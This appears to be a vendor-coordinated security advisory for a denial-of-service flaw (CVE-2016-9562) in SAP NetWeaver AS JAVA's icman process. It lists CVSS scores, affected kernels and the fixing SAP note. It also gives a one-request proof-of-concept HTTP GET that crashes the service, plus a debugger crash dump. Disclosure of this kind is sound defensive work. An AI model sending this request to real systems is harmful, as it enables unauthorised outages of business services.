**CVSS v3.1 base score: 7.5 (High)**, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Metric | Value
---|---
Attack Vector | Network
Attack Complexity | Low
Privileges Required | None
User Interaction | None
Scope | Unchanged
Confidentiality Impact | None
Integrity Impact | None
Availability Impact | High

**CVSS v2 base score: 5.0 (Medium)**, vector AV:N/AC:L/Au:N/C:N/I:N/A:P

Metric | Value
---|---
Access Vector | Network
Access Complexity | Low
Authentication | None
Confidentiality Impact | None
Integrity Impact | None
Availability Impact | Partial

**EPSS: 0.004 (Low)**, percentile 71.5%
**Application:** SAP NetWeaver AS JAVA
**Versions Affected:** SAP NetWeaver AS JAVA 7.4
**Vendor URL:** SAP
**Bugs:** Denial of Service
**Reported:** 22.04.2016
**Vendor response:** 23.04.2016
**Date of Public Advisory:** 09.08.2016
**Reference:** SAP Security Note 2313835
**Author:** Vahagn Vardanyan (ERPScan)
Class: Denial of Service
Impact: Denial of Service
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE: CVE-2016-9562
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:

Metric | Value
---|---
AV: Attack Vector (related exploit range) | Network (N)
AC: Attack Complexity (required attack complexity) | Low (L)
PR: Privileges Required (level of privileges needed to exploit) | None (N)
UI: User Interaction (required user participation) | None (N)
S: Scope (change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U)
C: Impact to Confidentiality | None (N)
I: Impact to Integrity | None (N)
A: Impact to Availability | High (H)
An unauthenticated remote attacker can send a specially crafted HTTP request to crash SAP icman, the Internet Communication Manager process that fronts the instance's HTTP(S) and P4 listeners.
A Denial of Service vulnerability lets an attacker terminate the process of the vulnerable component. Until that process is restarted, nobody can use the service, which interrupts dependent business processes, causes system downtime and, as a result, damages business reputation.
Affected kernel releases:
SAP KERNEL 7.21 32-BIT
SAP KERNEL 7.21 32-BIT UNICODE
SAP KERNEL 7.21 64-BIT
SAP KERNEL 7.21 64-BIT UNICODE
SAP KERNEL 7.21 EXT 32-BIT
SAP KERNEL 7.21 EXT 32-BIT UC
SAP KERNEL 7.21 EXT 64-BIT
SAP KERNEL 7.21 EXT 64-BIT UC
SAP KERNEL 7.22 64-BIT
SAP KERNEL 7.22 64-BIT UNICODE
SAP KERNEL 7.22 EXT 64-BIT
SAP KERNEL 7.22 EXT 64-BIT UC
SAP KERNEL 7.42 64-BIT
SAP KERNEL 7.42 64-BIT UNICODE
SAP KERNEL 7.45 64-BIT
SAP KERNEL 7.45 64-BIT UNICODE
To correct this vulnerability, install SAP Security Note 2313835.
The vulnerability is triggered by a single HTTPS GET request to the P4 tunneling servlet (sap.com~P4TunnelingApp!web/myServlet) of SAP NetWeaver AS JAVA. The WinDbg output below shows the fault in icman!P4PlugInReadHandler (p4_plg.c, line 1192): the instruction mov ecx, dword ptr [rdi+4] executes with rdi = 0, so the ICM worker thread dereferences address 4 (a NULL pointer dereference in the P4 plug-in's read handler) and the icman process terminates.
PoC

```http
GET https://SAP_IP:50005/sap.com~P4TunnelingApp!web/myServlet HTTP/1.1
Host: 172.16.10.65:50005
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
```

WinDbg register dump and call stack of the icman worker thread at the crash:

```text
0:007> r
rax=0000a323260f1252 rbx=0000000025c500d0 rcx=0000000025c500d0
rdx=0000000000000001 rsi=0000000000000002 rdi=0000000000000000
rip=000000013f3af019 rsp=0000000003500d40 rbp=0000000003500e40
r8=0000000025c50400 r9=0000006c004c0002 r10=0000000003500c20
r11=00000000021b2df0 r12=0000000000000002 r13=000000013f2c0000
r14=0000000000000000 r15=0000000000000001
iopl=0 nv up ei ng nz ac po cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010297
icman!P4PlugInReadHandler+0xb9:
00000001`3f3af019 8b4f04 mov ecx,dword ptr [rdi+4] ds:00000000`00000004=????????

00000000`03500d40 00000001`3f363fb5 icman!P4PlugInReadHandler+0xb9 [d:\depot\bas\742_rel\src\krn\si\ic\p4_plg.c @ 1192]
00000000`03500ec0 00000001`3f3638ea icman!IcmMplxAsyncReadDone+0x75 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 5088]
00000000`03500f10 00000001`3f362626 icman!IcmMplxExecCall+0x36a [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 4808]
00000000`0350fd20 00000000`74901d9f icman!IcmMplxThread+0x5f6 [d:\depot\bas\742_rel\src\krn\si\ic\icxxmplx.c @ 3840]
00000000`0350fdb0 00000000`74901e3b MSVCR100!endthreadex+0x43
00000000`0350fde0 00000000`7716652d MSVCR100!endthreadex+0xdf
00000000`0350fe10 00000000`7729c541 kernel32!BaseThreadInitThunk+0xd
00000000`0350fe40 00000000`00000000 ntdll!RtlUserThreadStart+0x21
```